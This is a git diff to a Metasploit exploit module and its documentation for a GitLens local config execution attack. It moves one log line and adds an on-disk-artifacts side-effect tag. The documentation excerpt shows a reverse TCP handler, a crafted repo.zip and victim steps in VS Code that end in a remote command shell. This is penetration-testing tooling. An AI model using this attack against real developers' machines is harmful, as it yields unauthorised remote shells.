diff --git a/documentation/modules/exploit/multi/fileformat/gitlens_local_config_exec.md b/documentation/modules/exploit/multi/fileformat/gitlens_local_config_exec.md index e05094e6f8ad..8ca6938a9e1b 100644 --- a/documentation/modules/exploit/multi/fileformat/gitlens_local_config_exec.md +++ b/documentation/modules/exploit/multi/fileformat/gitlens_local_config_exec.md @@ -48,12 +48,12 @@ msf6 exploit(multi/fileformat/gitlens_local_config_exec) > exploit [*] Started reverse TCP handler on 192.168.10.147:4444 [+] repo.zip stored at /root/.msf4/local/repo.zip [*] Waiting for shell -[*] Sending stage (336 bytes) to 192.168.10.100 ``` Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line. ``` +[*] Sending stage (336 bytes) to 192.168.10.100 [*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.100:62807) at 2024-03-19 17:46:46 +0000 diff --git a/modules/exploits/multi/fileformat/gitlens_local_config_exec.rb b/modules/exploits/multi/fileformat/gitlens_local_config_exec.rb index a7341d748a50..b7454aace5e6 100644 --- a/modules/exploits/multi/fileformat/gitlens_local_config_exec.rb +++ b/modules/exploits/multi/fileformat/gitlens_local_config_exec.rb @@ -67,7 +67,7 @@ def initialize(info = {}) 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], - 'SideEffects' => [SCREEN_EFFECTS] # windows fetch payloads pops up a CMD window for a second, then goes away + 'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # windows fetch payloads pops up a CMD window for a second, then goes away }, 'Privileged' => false, 'DisclosureDate' => '2023-11-14'